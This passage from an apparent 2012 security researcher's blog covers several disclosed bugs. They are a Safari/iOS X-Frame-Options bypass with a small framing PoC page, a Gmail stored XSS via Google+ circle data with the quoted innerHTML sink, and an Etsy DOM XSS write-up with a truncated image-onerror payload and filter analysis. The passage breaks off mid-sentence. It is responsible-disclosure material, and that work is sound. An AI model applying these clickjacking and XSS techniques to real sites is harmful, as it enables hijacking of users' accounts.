<span style="font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span></div>
<div class="MsoNormal" style="background-repeat: initial initial; direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">Setting this header is supposed to make the browser
render the framed response <b>only</b> if the document embedding it (the top-level page)
is on the same origin as the iframe's src attribute.</span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">It appears that the<span style="color: #222222;"> </span><b><span style="color: red;">Safari
browser does not enforce X-Frame-Options</span></b> </span><span style="font-family: Arial, sans-serif;">and therefore displays our frame element as if it had no protection at all.</span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="color: #222222; font-family: "Arial","sans-serif"; font-size: 9.0pt; line-height: 115%; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
</div>
<br />
<span style="font-family: Arial;">Normal behavior, IE9 enforcing X-Frame-Options: </span><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTKr5llAqFqlO2_WHSXd1l-uJ7jnQnXrZk8iiH5FW2hrdISJkqCcRvwShyphenhyphenSz1Z6CIx9zfmZWqc4kf3antqXRB9zK-s_dr0lA0gLPWxCTWh_cIz482LiGLs-dIwP9FqazhHhFnqQl0jIjA/s1600/PoC+apple.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTKr5llAqFqlO2_WHSXd1l-uJ7jnQnXrZk8iiH5FW2hrdISJkqCcRvwShyphenhyphenSz1Z6CIx9zfmZWqc4kf3antqXRB9zK-s_dr0lA0gLPWxCTWh_cIz482LiGLs-dIwP9FqazhHhFnqQl0jIjA/s400/PoC+apple.PNG" width="400" /></a></div>
<br />
<br />
<span style="font-family: Arial;"><br /></span>
<span style="font-family: Arial;">Safari on iOS 5:</span><br />
<span style="font-family: Arial;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnkVd9_NoF93btjCWjzCKhKx-ZFeXlmwr2kz2h1Ceg8dt3v2GwR6eLBCW3KDFqUK40Gylmp2rNOl2nco9LjWxfIrNIXXiio79G7D5mvaEID5YN-GB0NoP2CmkUqf27b69kV7fyYXG1DL4/s1600/photo.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnkVd9_NoF93btjCWjzCKhKx-ZFeXlmwr2kz2h1Ceg8dt3v2GwR6eLBCW3KDFqUK40Gylmp2rNOl2nco9LjWxfIrNIXXiio79G7D5mvaEID5YN-GB0NoP2CmkUqf27b69kV7fyYXG1DL4/s400/photo.PNG" width="266" /></a></div>
<span style="font-family: Arial;"><br /></span>
<br />
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<b style="color: #999999; font-family: Arial; font-size: xx-large;">PoC Test Page:</b></div>
<div style="background: #202020; background: black; border-width: .1em .1em .1em .8em; border: solid gray; color: white; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #6ab825; font-weight: bold;"><html></span>
<span style="color: #6ab825; font-weight: bold;"><head><title></span>X-Frame-Options Bypass<span style="color: #6ab825; font-weight: bold;"></title></head></span>
<span style="color: #6ab825; font-weight: bold;"><h1></span>Apple PoC X-Frame-Options <span style="color: #6ab825; font-weight: bold;"></h1></span>
<span style="color: #6ab825; font-weight: bold;"><iframe</span> <span style="color: #bbbbbb;">id=</span><span style="color: #ed9d13;">"X"</span> <span style="color: #bbbbbb;">src=</span><span style="color: #ed9d13;">"http://www.google.com"</span><span style="color: #6ab825; font-weight: bold;">></iframe></span>
<span style="color: #6ab825; font-weight: bold;"><script></span>
<span style="color: #d0d0d0;">framex</span> <span style="color: #d0d0d0;">=</span> <span style="color: #24909d;">document</span><span style="color: #d0d0d0;">.getElementById(</span><span style="color: #ed9d13;">"X"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">framex.onload</span> <span style="color: #d0d0d0;">=</span> <span style="color: #6ab825; font-weight: bold;">function</span> <span style="color: #d0d0d0;">()</span> <span style="color: #d0d0d0;">{</span> <span style="color: #d0d0d0;">}</span>
<span style="color: #6ab825; font-weight: bold;"></script></span>
<span style="color: #6ab825; font-weight: bold;"></html></span>
</pre>
</div>
<br />
<span style="font-family: Arial;">By the way, this also means clickjacking is possible anywhere against victims on iOS 5 and lower.</span><br />
<span style="font-family: Arial;"><br /></span>
<span style="color: #999999; font-family: Arial; font-size: x-large;"><b>So What Should I Do?</b></span><br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;">Well, Apple did the right thing and fixed this issue in the new iOS (6.0.1).</span><br />
<span style="font-family: Arial, sans-serif;">Unless you want to stay vulnerable, knowing you can be a victim of advanced client-side attacks against your Gmail/Facebook sessions, make sure you use iOS 6.</span><br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;"><br /></span></div>
</div>
</div>
[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com3tag:blogger.com,1999:blog-7534521580510357281.post-3890268686969013772012-08-26T21:04:00.002+03:002012-08-26T21:18:10.132+03:00White-hat cyberbug bounty nets cash - NYPOST <span style="color: #f6b26b; font-family: 'Arial Black'; font-size: 35.5px; letter-spacing: -2px; line-height: 1em;">White-hat cyberbug bounty nets cash</span><br />
<h2>
<span style="font-family: Arial; font-size: 12px; font-weight: normal;">By SARA ASHLEY O’BRIEN</span></h2>
<div style="direction: ltr;">
<div style="direction: ltr;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Come on, White Hats: Hack into our system, find a bug — and make it an interesting one! This seems to be the resounding message that major online businesses are spreading.<br />With US spending on cybercrime security estimated to exceed $23 billion this year, according to the research company Gartner, online businesses are onto the fact that cybercrime is a very real threat.<br /><br />Businesses like Facebook, Google, Mozilla, Adobe, Microsoft and, as of June, PayPal, have developed “Bug Bounty” programs to recruit savvy security researchers like Hayak to help fight the good fight against cybercrime.</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><b style="font-family: Arial;"><span style="color: #e69138;">These are snippets from a great story I got to be part of, published in the NYPOST</span></b><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Read more:</span><br />
<a href="http://www.nypost.com/p/news/business/white_hat_cyberbug_bounty_nets_cash_7c6JPTUlEmoDBsszeD6c1I#ixzz24g0m8SUC" style="font-family: Arial;" target="_new">http://www.nypost.com/p/news/business/white_hat_cyberbug_bounty_nets_cash</a><span style="font-family: Arial;"><br /></span><br />
<span style="font-family: Arial;"><br /></span><span style="font-family: Arial;">Great write-up. </span><br />
<span style="font-family: Arial;">I appreciate the story very much. Thank you, NYPOST.</span><br />
<span style="font-family: Arial;"><br /></span>
<span style="font-family: Arial;"><br /></span></div>
</div>
[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com3tag:blogger.com,1999:blog-7534521580510357281.post-81602446665511744732012-06-27T01:27:00.002+03:002012-06-27T01:49:45.613+03:00Google Mail Hacking - Gmail Stored XSS - 2012!<h2>
<span class="Apple-style-span" style="color: #999999; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: x-large;">Gmail Accounts Hacking Risk 2012!</span><span style="font-size: large;"> </span></span></h2>
<div style="direction: ltr;">
<div style="direction: ltr;">
<span style="font-family: Arial, Helvetica, sans-serif;">Millions of users use <b><span style="color: #f6b26b;">Gmail </span></b>as their information center for things such as <b><span style="color: #f6b26b;">business, chat, placing orders, payment confirmations, and the main password-recovery mailbox</span></b> for other web services, and so on.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Many people, <i>including myself</i>, use Gmail to store important and personal data; <b><span style="color: #f6b26b;">none of us want our data to be at risk of theft</span>,</b> manipulation, let alone the Gmail account being completely hacked!</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="color: #f6b26b;">I found a way to do all of that!</span></b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Fortunately for us, Google puts a lot of effort into securing its services, mostly by doing a great job, which includes running a vulnerability reward program.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">I did some quick research and reported this vulnerability along with all the related details. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">I must say Google's response was very quick, and so was their fix.<span style="color: orange;"> (<b>it is fixed</b>)</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">as it appears here: <a href="http://www.google.com/about/company/rewardprogram.html">Vulnerability Reward Program</a> (even after the bounty increase):</span><br />
<span style="color: #ffe599; font-family: Arial, Helvetica, sans-serif;">Google's Reward for this bug: <b>$1337 (mail.google.com)</b></span><br />
<span style="font-family: Arial;">PoC Picture:</span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmSG5RrSsqxmDSIvvP1icu-MdVIu3zNy2Zjz9rkOeqM18Pa30em-EIk6dit_HYwriV4fIRiJ7piMds5Z8MUZ3vJkZ-taAWqlHsqihC5jo5tCnUpvrDusTKY4CCUKo3J2x7kyIXX75WP1U/s1600/gmail+XSS+05+2012+-blog.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmSG5RrSsqxmDSIvvP1icu-MdVIu3zNy2Zjz9rkOeqM18Pa30em-EIk6dit_HYwriV4fIRiJ7piMds5Z8MUZ3vJkZ-taAWqlHsqihC5jo5tCnUpvrDusTKY4CCUKo3J2x7kyIXX75WP1U/s400/gmail+XSS+05+2012+-blog.png" width="400" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<b><span style="font-size: large;"><span style="font-family: Arial, Helvetica, sans-serif;">Technical Details:</span><span style="font-family: Arial, Helvetica, sans-serif;"> </span></span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />I am quite busy with work and personal life these days, so I had set aside the reward programs of Google, Facebook and others.</span></div>
<div style="direction: ltr;">
<span style="font-family: Arial;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">I was just checking my mail the other day and I noticed something different.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Google made this nice change in Gmail, apparently around December 2011: <a href="http://www.googleplusplanet.com/2011/12/google-adds-circles-gmail/">Google Adds circles to Gmail</a> </span><br />
<b><span style="color: #f6b26b; font-family: Arial, Helvetica, sans-serif; font-size: large;">"Users can now Filter their Mails based on their Circles"</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<b style="color: #999999; font-family: Arial;"><span style="font-size: x-large;">Trusting your Google+ Friends?</span></b></div>
<div style="direction: ltr;">
<div>
<br />
<span style="font-family: Arial;">When I clicked this Gmail Circles feature, I saw my Google+ connections: profile pictures, nicknames and some other</span><span style="font-family: Arial;"> circles-related data. </span><br />
<span style="color: #f6b26b; font-family: Arial;"><b>Do they control this data?! Yes!</b></span></div>
<div>
<span style="font-family: Arial;">I had to get back into the business for a while: a Gmail stored XSS is a serious finding!</span></div>
<div>
<span style="font-family: Arial;"><br /></span></div>
<div>
<span style="font-family: Arial;">So I immediately researched that feature's JavaScript code.</span><br />
<span style="font-family: Arial;">It appeared that data coming from Google+ wa</span><span style="font-family: Arial, Helvetica, sans-serif;">s not sanitized by Gmail!</span><br />
<span style="font-family: Arial;"><br /></span></div>
<div style="background-color: black; background-position: initial initial; background-repeat: initial initial; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;">
<pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> </span><span style="color: #d0d0d0;">zk.prototype.Ca</span><span style="color: white;"> </span><span style="color: #d0d0d0;">=</span><span style="color: white;"> </span><span style="color: #6ab825; font-weight: bold;">function</span><span style="color: white;"> </span><span style="color: #d0d0d0;">$pn(a,</span><span style="color: white;"> </span><span style="color: #d0d0d0;">c,</span><span style="color: white;"> </span><span style="color: #d0d0d0;">d)</span><span style="color: white;"> </span><span style="color: #d0d0d0;">{</span><span style="color: white;">
</span><span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.xa</span><span style="color: white;"> </span><span style="color: #d0d0d0;">=</span><span style="color: white;"> </span><span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">;</span></pre>
<pre style="line-height: 125%; margin: 0px;"> <span style="color: #6ab825; font-weight: bold;">if</span><span style="color: white;"> </span><span style="color: #d0d0d0;">(!</span><span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.ea)</span><span style="color: white;"> </span><span style="color: #d0d0d0;">{</span><span style="color: white;">
</span><span style="color: #6ab825;"><b>//Shorten/removed</b></span><span style="color: white;">
</span><span style="color: #6ab825; font-weight: bold;">var</span><span style="color: white;"> </span><span style="color: #d0d0d0;">e</span><span style="color: white;"> </span><span style="color: #d0d0d0;">=</span><span style="color: white;"> </span><span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.Bb.zb().body,</span><span style="color: white;"> </span><span style="color: #d0d0d0;">g</span><span style="color: white;"> </span><span style="color: #d0d0d0;">=</span><span style="color: white;"> </span><span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.ea.va();</span><span style="color: white;">
</span><b style="background-color: black; color: #6ab825;">//Shorten/removed</b></pre>
<pre style="color: white; line-height: 125%; margin: 0px;"> <span style="color: #d0d0d0;">e.wa</span> <span style="color: #d0d0d0;">=</span> <span style="color: #d0d0d0;">h</span>
<span style="color: #d0d0d0;">}</span>
<span style="color: #d0d0d0;">a:</span> <span style="color: #d0d0d0;">{</span>
<span style="color: #6ab825; font-weight: bold;">if</span> <span style="color: #d0d0d0;">(d)</span>
<span style="color: #6ab825; font-weight: bold;">switch</span> <span style="color: #d0d0d0;">(d.toLowerCase().split(</span><span style="color: #ed9d13;">","</span><span style="color: #d0d0d0;">)[</span><span style="color: #3677a9;">1</span><span style="color: #d0d0d0;">])</span> <span style="color: #d0d0d0;">{</span>
<span style="color: #6ab825; font-weight: bold;">case</span> <span style="color: #ed9d13;">"l"</span><span style="color: #d0d0d0;">:</span>
<span style="color: #6ab825; font-weight: bold;">break</span> <span style="color: #d0d0d0;">a;</span>
<span style="color: #6ab825; font-weight: bold;">case</span> <span style="color: #ed9d13;">"r"</span><span style="color: #d0d0d0;">:</span>
/removed<span style="color: #d0d0d0;">;</span>
<span style="color: #6ab825; font-weight: bold;">break</span> <span style="color: #d0d0d0;">a</span>
<span style="color: #d0d0d0;">}</span>
<span style="color: #d0d0d0;">e</span> <span style="color: #d0d0d0;">=</span> <span style="color: #3677a9;">2</span>
<span style="color: #d0d0d0;">}</span>
<span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.wa.setPosition(cka(d),</span> <span style="color: #d0d0d0;">e,</span> <span style="color: #d0d0d0;">i,</span> <span style="color: #d0d0d0;">-</span><span style="color: #3677a9;">1</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">jc(</span><span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.ea.va(),</span> <span style="color: #ed9d13;">"T-ays-avH"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">ud(</span><span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.ea.va(),</span> <span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">,</span> <span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">);</span>
<span style="color: #6ab825; font-weight: bold;">this</span><span style="color: red;">.ea.Mc().innerHTML = <b>c</b>; <b></b></span><b><span style="color: orange;">//c = Data from Google+;</span></b>
<span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.wa.To(a);</span>
<span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.wa.Me(k,</span> <span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">)</span>
<span style="color: #d0d0d0;">};</span>
</pre>
</div>
<span style="font-family: Arial;"><br /></span><br />
<span style="font-family: Arial;">This Gmail code was creating a tooltip that included profile and circles information coming from your Google+ friend's account; if they used a payload, your mail account would have been at serious risk.</span><br />
<span style="font-family: Arial;"><br /></span><br />
<span style="color: #999999; font-family: Arial; font-size: x-large;"><b>Exploiting the Vulnerability - malicious Google+ Account.</b></span><br />
<div>
<span style="font-family: Arial;"><br /></span><br />
<span style="font-family: Arial;">First, it is important to note that <b><span style="color: #f6b26b;">anyone </span></b>you had already accepted as a friend in Google+ could trigger this attack on your Gmail account!</span></div>
<div>
<span style="font-family: Arial;"><br /></span></div>
<div>
<span style="font-family: Arial;">So all that is left is crafting a very nice Google+ account with an attractive profile; once this evil account has gathered many friends/victims, attack them all!</span></div>
<div>
<span style="font-family: Arial;"><br /></span></div>
<div>
<span style="font-family: Arial;"><span style="color: #f6b26b;"><b>Google+ </b><b>was </b>and still is <b>blocking </b>the <b>possibility of using a payload in the required field that was used</b> to trigger this attack, but </span><b><span style="color: #f6b26b;">I found a way around it</span>; </b>sorry, but I cannot reveal how I did that. (I am sure some of you pros might know how.)</span></div>
<div>
<span style="font-family: Arial;"><br /></span></div>
<div>
<span style="font-family: Arial;">After I used my technique and crafted the evil Google+ profile, it was possible to attack the Gmail of all of that profile's friends! </span><br />
<span style="font-family: Arial;"><br /></span><br />
<span style="font-family: Arial;">PoC Picture: </span><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmSG5RrSsqxmDSIvvP1icu-MdVIu3zNy2Zjz9rkOeqM18Pa30em-EIk6dit_HYwriV4fIRiJ7piMds5Z8MUZ3vJkZ-taAWqlHsqihC5jo5tCnUpvrDusTKY4CCUKo3J2x7kyIXX75WP1U/s1600/gmail+XSS+05+2012+-blog.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmSG5RrSsqxmDSIvvP1icu-MdVIu3zNy2Zjz9rkOeqM18Pa30em-EIk6dit_HYwriV4fIRiJ7piMds5Z8MUZ3vJkZ-taAWqlHsqihC5jo5tCnUpvrDusTKY4CCUKo3J2x7kyIXX75WP1U/s400/gmail+XSS+05+2012+-blog.png" width="400" /></a><br />
<br />
<br />
<div style="text-align: left;">
<span style="font-family: Arial;"></span></div>
<span style="font-family: Arial;">As always, I appreciate the opportunity to preserve my skills and gain some more experience.</span><br />
<span style="font-family: Arial;">Thank you Google security team.</span><br />
<span style="font-family: Arial;"><br /></span><br />
<span style="font-family: Arial;">"Ben Hayak" - Google Security Hall of Fame Page</span><br />
<span style="font-family: Arial;"><a href="http://www.google.com/about/company/halloffame.html">http://www.google.com/about/company/halloffame.html</a>
</span><br />
<br />
<br />
<span style="font-family: Arial;"><br /></span></div>
</div>
</div>[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com17tag:blogger.com,1999:blog-7534521580510357281.post-9378099719554740982012-06-15T03:05:00.001+03:002012-06-15T08:15:46.835+03:00Layer3 DOM XSS in Latest jquery - Etsy<h2>
<span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif; font-size: large;">Turning Useless Self DOM XSS into a treat!</span></h2>
<div style="direction: ltr;">
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">During my research into DOM XSS, while developing my own detection technique, I found this interesting case: a DOM XSS that no DOM XSS scanner I came across detected. So I decided to share a quick overview of how I turned this self-only, layer-3 DOM XSS into a working, exploitable DOM XSS.</span></div>
<div style="direction: ltr;">
<span class="Apple-style-span"></span><span style="font-family: Arial;">It all started with this small piece of code:</span></div>
<div style="direction: ltr;">
<br /></div>
<div style="direction: ltr;">
<div style="background: black; border-color: gray; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; color: white; overflow: auto; padding: 0.2em 0.6em; width: auto;">
<pre style="line-height: 125%; margin: 0px;"><span style="color: #6ab825; font-weight: bold;"><script </span><span style="color: #bbbbbb;">type=</span><span style="color: #ed9d13;">"text/javascript"</span><span style="color: #6ab825; font-weight: bold;">></span>
<span style="color: #d0d0d0;">Etsy.loader.require(</span><span style="color: #ed9d13;">'jquery.ba-hashchange'</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">Etsy.loader.require(</span><span style="color: #ed9d13;">'help'</span><span style="color: #d0d0d0;">);</span>
<span style="color: #6ab825; font-weight: bold;"></script></span>
</pre>
</div>
</div>
<div style="direction: ltr;">
<br />
<span style="font-family: Arial;">This is going to be a long one, but it covers:</span><br />
<br />
<ul>
<li><span style="font-family: Arial;">DOM XSS.</span></li>
<li><span style="font-family: Arial;">Logic flow exploitation.</span></li>
<li><span style="font-family: Arial;">jQuery vulnerability (latest release, unpatched yet).</span></li>
</ul>
<br />
<br />
<span style="font-family: Arial;">Final conclusions:</span><span style="font-family: Arial;"><br /><span style="color: orange;">1. First conclusion (easy): the main JavaScript layer loads a second, dynamic code block (covered).</span></span><br />
<span style="font-family: Arial;">2. The payload goes through the dynamic code block, where it passes through a filter meant to prevent DOM XSS (so it appears to be self-only).</span><br />
<span style="font-family: Arial;">3. The layer-2 code block loads another layer (3), this time jQuery, and then executes a function that is vulnerable to DOM XSS (in the latest version, 1.7.2, and in older versions as well).</span><br />
<span style="font-family: Arial;"><br /></span></div>
<div style="direction: ltr;">
<h3>
<span style="color: #999999;"><span style="font-family: Arial; font-size: x-large;">Self DOM XSS?</span></span></h3>
</div>
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Using the help section's search feature, I could trigger a very simple XSS by typing the payload in the search box and hitting search. X_X. This is pretty lame.</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">(Once I put a payload directly in the URL, it got filtered and did not trigger.)</span></div>
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">We need the victim to be careless enough to actually type the payload and click the search button. I consider this an almost worthless, low-risk self-XSS,</span></div>
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">so I thought this might be useless and not exploitable.
</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
<h3>
<span class="Apple-style-span" style="color: #999999; font-family: Arial, Helvetica, sans-serif; font-size: x-large;">Strange Behavior (not so fast...):</span></h3>
</div>
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">But that is when I noticed a strange behavior!
Look at the picture below:</span></div>
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"> (using a payload of <img src=1 onerror=javascript......>)</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsfk-aFqmzbAnoPgNS0mB-Zylf2XTFHjIWhWWxQHNTWSfn8IiP86R37B3u2jhhrijMwqL_YCW_sZ637hzv13vxVDGuvVch44lKqy_j_hLjH_uu4QKzFq941SZ57qj8HNoNiNhfh1dk8Hs/s1600/etsy.PNG" imageanchor="1" style="font-family: Arial, Helvetica, sans-serif; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsfk-aFqmzbAnoPgNS0mB-Zylf2XTFHjIWhWWxQHNTWSfn8IiP86R37B3u2jhhrijMwqL_YCW_sZ637hzv13vxVDGuvVch44lKqy_j_hLjH_uu4QKzFq941SZ57qj8HNoNiNhfh1dk8Hs/s400/etsy.PNG" width="400" /></a></div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Something strange?
</span></div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">If you do not see it, you should gather yourself and look more carefully the next time you think you have covered the security holes and are about to report "not exploitable" or "low-risk vulnerability".</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div style="direction: ltr;">
</div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div style="direction: ltr;">
<h3>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
<span style="color: #999999; font-size: x-large;">What is so strange?</span></span></h3>
</div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">What you can see in the picture is that the XSS triggered (the <img src=1> tag) and, for some reason, the payload "<em>disappeared</em>" from the URL query, right?</span></div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Oh wait, did it???
No!</span></div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
It was only filtered! The query has now changed to "http://site.com/help/2643#/afsddddddd<span style="color: orange;">/1</span>".
Where did that "<span style="color: orange;">/1</span>" come from? What is going on? <br />
Let us run more tests: </div>
<div style="direction: ltr;">
Look what happens when I used this URL: <br />
"http://site.com/help/2643#/<span style="color: orange;">String 2ndString/1"</span></div>
<div style="direction: ltr;">
<br />
The filter turned it into the following:<br />
http://site.com/help/2643#/String/2ndString<span style="color: orange;">/1</span><br />
<br />
Now that is definitely worth a deeper look at the code loaded as layer 2:<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmW3PaQDUC6mI2ZEJ3vgBZHp_W5oP6fdZRVxOCiIELVG1LC-Nojf1V6soykbbldjopr9qmQEySKTtADHazAbTbaVl-WfZ4VU2t8UmiQ2cHjEzNTMOMdjnYsVdDD2KU8xvBrxZ7NLBkCss/s1600/backslash+S.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmW3PaQDUC6mI2ZEJ3vgBZHp_W5oP6fdZRVxOCiIELVG1LC-Nojf1V6soykbbldjopr9qmQEySKTtADHazAbTbaVl-WfZ4VU2t8UmiQ2cHjEzNTMOMdjnYsVdDD2KU8xvBrxZ7NLBkCss/s400/backslash+S.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
<div style="direction: ltr;">
<h3>
<span style="color: #999999; font-size: x-large;">Filter Details (YES It is vulnerable):</span></h3>
</div>
</div>
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
<div style="direction: ltr;">
The filter was checking location.hash, replacing any space with a forward slash to separate the query string, and replacing any potential XSS HTML tag with an empty string (NULL) using a regex.<br />
<br />
Seems right, but there was a <span style="font-size: large;">HUGE </span>security hole.<br />
<br />
<span style="font-family: Arial;">Final Conclusions again:</span><span style="font-family: Arial;"><br />1. 1st conclusion(easy) the main javascript layer loads a second dynamic block (covered).<span style="color: red;"><br /></span></span><br />
<span style="color: orange; font-family: Arial;">2. the payload goes through the dynamic code block and inside gets through a filter to avoid DOM XSS (appears as Self-Only) (covered).</span><br />
<span style="font-family: Arial;">3. the layer 2 code block loads another layer(3) this time it is jquery, and then execute a function that is vulnerable to DOM XSS(latest version 1.72 and older versions as well).</span><br />
<div style="direction: ltr;">
<div style="direction: ltr;">
<h3>
<span style="color: #999999; font-size: x-large;">HUGE security hole in a legitimate XSS filter:</span></h3>
</div>
</div>
<br />
This is where the magic happened! There is a JavaScript condition that determines whether the user is actually using the search feature and, therefore, whether the input should be checked for DOM XSS by the layer-2 filter code or not.<br />
After researching all the relevant code in the JavaScript filter block, it appeared that exploitation is pretty simple!<br />
Legitimate behavior:<br />
